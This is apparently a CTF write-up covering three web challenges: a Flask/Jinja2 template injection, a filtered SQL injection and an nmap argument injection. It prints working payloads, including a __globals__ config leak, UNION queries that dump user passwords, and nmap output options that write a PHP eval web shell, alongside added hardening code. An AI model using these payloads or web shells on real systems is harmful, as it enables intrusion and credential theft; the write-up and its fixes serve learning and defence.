Basic use of CTF web shrink template injection nmap
2022-07-07 08:10:00 【_ s1mple】
[WesternCTF2018]shrine
import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s return flask.render_template_string(safe_jinja(shrine)) if __name__ == '__main__': app.run(debug=True)
Opening the challenge, the source code is shown like this. It is not formatted at all, so we tidy it up by hand. After formatting:
```python
import flask
import os

app = flask.Flask(__name__)
# The flag is read from the environment and kept only in app.config
app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    # Show this file's own source code
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    # Everything after /shrine/ is passed in as the `shrine` argument
    def safe_jinja(s):
        # Strip parentheses, then null out each blacklisted name with a {% set %} prefix
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    # User input becomes template source: this is the template injection
    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
```
Code audit: two routes are defined. The first one simply displays the source code.
The second route, /shrine/, takes whatever is submitted after the path and renders it as a template; in a template, the content inside {{ }} is evaluated as back-end variables.

app.config['FLAG'] = os.environ.pop('FLAG')

This line stores a config entry named FLAG, which is presumably the flag. If config were not filtered, {{config}} would show the whole content of app.config.

return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

This line traverses the blacklist and sets each name to None by prepending a {% set %} statement to the template. In this challenge that is config and self (so self.__dict__ is blocked as well).
However, there are also some built-in global functions available in the template, such as url_for and get_flashed_messages.
Normally one would try passing in config or self.__dict__.
But what comes back is None, and the other one does not echo at all.
Use /shrine/{{url_for.__globals__}}
You will notice current_app, which refers to the current app, so we can read the config of the current app:
/shrine/{{url_for.__globals__['current_app'].config}}
The second method :
get_flashed_messages
Returns the list of flash messages previously passed in through flash(). Flask adds a message represented by a string object to a message queue, and it is then taken out by calling get_flashed_messages() (flash messages can only be retrieved once; they are cleared after being taken out).
**/shrine/{{get_flashed_messages.__globals__['current_app'].config}}**
Obtain the flag.
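To show why the blacklist in safe_jinja does not help and what actually closes the hole, here is an added example (not code from the challenge or from Flask). It uses plain Jinja2 with a constructed stand-in for current_app and url_for; the vulnerable renderer reproduces the challenge's filter, while the hardened one treats user text as data and renders inside a SandboxedEnvironment, which refuses dunder attribute access such as __globals__.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError


# Constructed stand-ins for the challenge's Flask objects: an app with a config
# dict, and a module-level function that (like flask.url_for) reaches it via __globals__.
class _App:
    config = {"FLAG": "flag{constructed_example}"}


current_app = _App()


def url_for(endpoint):
    return "/" + endpoint


def safe_jinja(s):
    # The challenge's filter: strip parentheses, null out blacklisted names.
    s = s.replace('(', '').replace(')', '')
    blacklist = ['config', 'self']
    return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s


def render_challenge(user_template):
    # Vulnerable pattern: user text is compiled as the template source.
    env = Environment()
    env.globals['url_for'] = url_for
    return env.from_string(safe_jinja(user_template)).render()


def sandbox_blocks_globals(user_template):
    # Same bad pattern, but the sandbox rejects the __globals__ walk with SecurityError.
    env = SandboxedEnvironment()
    env.globals['url_for'] = url_for
    try:
        env.from_string(safe_jinja(user_template)).render()
        return False
    except SecurityError:
        return True


def render_hardened(user_text):
    # The real fix: a fixed template, user text passed as a variable (and autoescaped).
    env = SandboxedEnvironment(autoescape=True)
    env.globals['url_for'] = url_for
    return env.from_string("{{ shrine }}").render(shrine=user_text)
```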
[SWPU2019]Web1
First register an account; after logging in you can apply to post an announcement.
While testing, entering 1' shows that something is wrong.
Brute-forcing with my fuzz dictionary, every response of length 321 is filtered; I found a lot of filtering.
It is found that an error is reported.
Go straight to the payloads:
# group by to get the number of columns
-1'/**/group/**/by/**/22,'11
# View the version
-1'/**/union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
# Get the table names
-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_columns/**/where/**/table_schema=schema()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
# Get the usernames
-1'/**/union/**/select/**/1,(select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
# Get the passwords
-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
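The payloads above work because the filter looks for specific characters (spaces, among others) rather than changing how the query is built, and /**/ takes the place of every space. The following added example (not the challenge's code) rebuilds that situation on an in-memory SQLite database with a constructed schema and an assumed blacklist, then shows the fix: a bound parameter, which keeps the same input from ever becoming SQL.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the challenge's database: the table the search hits,
    # plus a users table holding the data the injection goes after.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE announce(id INTEGER, title TEXT, content TEXT)")
    con.execute("INSERT INTO announce VALUES (1, 'hello', 'first announcement')")
    con.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'constructed_secret')")
    return con


def blacklist_filter(value):
    # Assumed shape of the challenge's filter: reject the space character and
    # a few comment/terminator tokens. Nothing here stops /**/ or union.
    for bad in (' ', '#', '--', ';'):
        if bad in value:
            return False
    return True


def search_vulnerable(con, title):
    """Blacklist plus string concatenation: user text is spliced into the SQL."""
    if not blacklist_filter(title):
        return "filtered"
    sql = "SELECT id, title, content FROM announce WHERE title='%s'" % title
    return con.execute(sql).fetchall()


def search_parameterized(con, title):
    """The fix: the title travels as a bound parameter, never as SQL text."""
    sql = "SELECT id, title, content FROM announce WHERE title=?"
    return con.execute(sql, (title,)).fetchall()


# Same trick as the page's payloads, trimmed to three columns; the trailing
# '1'='1 closes the quote the way '22 does in the originals. No spaces anywhere.
PAYLOAD = ("-1'/**/union/**/select/**/1,username,password"
           "/**/from/**/users/**/where/**/'1'='1")
```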
[WANGDING Cup 2020 Rosefinch Group] Nmap
This challenge is quite interesting; it tests how nmap is used.
-oN normal output to a file
-oX XML output to a file
-oG grepable output to a file
-oA save in all formats at once
--append-output append to the output file instead of overwriting
ping 127.0.0.1
Since nmap's -oG option writes its output to a file, it can be used to write code into a file. Construct the payload:
' <?php @eval($_POST["cmd"]);?> -oG H0ne.php '
But the page echoes "hacker", which means something is blacklisted. Fuzz testing shows that php is filtered.
A Baidu search shows that <? can be used instead of <?php to get around it,
and the phtml suffix can be used instead of php.
The final payload is:
' <?= @eval($_POST["cmd"]);?> -oG H0ne.phtml '
The file is written.
Connect with AntSword and you can get the flag.
Get the echo.
The second method :
nmap also has the -oN option:
nmap -oN H0ne.txt
Construct:
' -oN H0ne.txt '
The file is written successfully.
Then write a PHP one-liner into it and simply connect to it:
' -oN H0ne.phtml <?=eval($_POST['cmd']); ?> '
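The root cause in this challenge is that the target string is pasted into a shell command, so a closing quote turns user text into extra nmap options. This added example (not the challenge's code) shows the argv the shell actually produces for the payloads above, and a hardened wrapper that accepts only an IP literal or a hostname, chooses the output path itself, and returns an argv list meant for subprocess.run with shell=False. The single-host restriction is an assumption about what such a form needs.

```python
import ipaddress
import re
import shlex

# Hostname per RFC 1123 label rules; anything with quotes, spaces or a leading '-' fails.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    r'(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$')


def is_valid_target(target):
    """True only for a single IPv4/IPv6 literal or a DNS hostname (assumed policy)."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(target))


def argv_seen_by_nmap(user_input):
    """What the shell hands to nmap when the input is wrapped in single quotes
    the way the challenge does it (assumed: nmap '<input>')."""
    return shlex.split("nmap '" + user_input + "'")


def build_nmap_argv(target, out_path):
    """Argv for subprocess.run(argv, shell=False). Raises ValueError on bad input.
    out_path is picked by the server (assumed: a directory the web server never serves)."""
    if not is_valid_target(target):
        raise ValueError("rejected target: %r" % target)
    return ["nmap", "-oN", out_path, target]
```

With the argv list form there is no shell to split on quotes, and since the target must match the host check it can never start with -oG or -oN, so no user-controlled option or output file name reaches nmap.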